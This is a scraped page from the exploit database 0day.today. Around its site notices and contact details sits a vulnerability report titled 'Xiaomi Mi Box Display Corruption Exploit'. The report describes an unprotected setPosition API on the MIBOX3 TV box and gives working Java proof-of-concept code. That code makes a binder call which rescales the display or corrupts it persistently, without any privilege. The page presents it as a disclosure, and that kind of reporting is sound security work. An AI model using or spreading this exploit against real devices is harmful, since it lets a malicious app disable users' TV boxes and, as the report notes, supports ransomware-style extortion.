0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Xiaomi Mi Box Display Corruption Exploit

Author

Bug Reporter

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

Platform

I would like to report a security vulnerability in Xiaomi Mi Box (model: MIBOX3, build.id : MHC19). 

The vulnerability allows rescaling and corrupting the display without any privilege requirement, thus creating an opportunity for a non-privilege malicious app to disable the basic functionalities that the TV box is offering or can even be used for ransomeware purpose - e.g., each time a target streaming app is launched, the malicious app can corrupt the display. 


This vulnerability is due to the following:

Xiaomi introduces a (non-protected) custom API in the SystemControl system service ¡°setPosition¡± which takes as arguments 4 integers. Once invoked with maliciously set parameters, the system display will be effected; e.g.,  (500, 500, 1000,1000) for rescaling the display and (1000,1000,1000,1000) for corrupting the display. Note that the display corruption will be persistent across reboots, making it very difficult to be fixed without a hard reset.



We can exploit this API as follows:

Class ServiceManager = Class.forName("android.os.ServiceManager");

Method getService = ServiceManager.getMethod("getService", String.class);

mRemote = (IBinder) getService.invoke(null,"system_control");

Parcel localParcel1 = Parcel.obtain();

Parcel localParcel2 = Parcel.obtain();

localParcel1.writeInterfaceToken("droidlogic.ISystemControlService");

localParcel1.writeInt(500);

localParcel1.writeInt(500);

localParcel1.writeInt(1000);

localParcel1.writeInt(1000); 

mRemote.transact(16, localParcel1, localParcel2, 0);  // 16 corresponds to the API setPosition

localParcel2.recycle();

localParcel1.recycle();


#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Xiaomi Mi Box Display Corruption Exploit

Report Error

Report Error